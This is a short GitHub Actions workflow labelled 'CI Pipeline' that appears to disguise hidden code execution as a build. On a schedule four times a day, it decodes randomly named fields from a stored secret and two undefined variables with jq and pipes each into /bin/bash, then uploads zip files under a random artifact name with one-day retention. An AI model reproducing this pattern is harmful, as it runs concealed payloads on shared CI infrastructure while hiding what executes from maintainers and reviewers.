name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '15 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          c6: ${{ secrets.c6 }}
        run: |
          printf '%s' "$c6" | jq -r .zgya83 | /bin/bash
          echo $lwd1 | jq -r .ubrof863 | /bin/bash
          echo $qci017 | jq -r .qf62 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: ezQdBNS6
          path: "*.zip"
          retention-days: 1
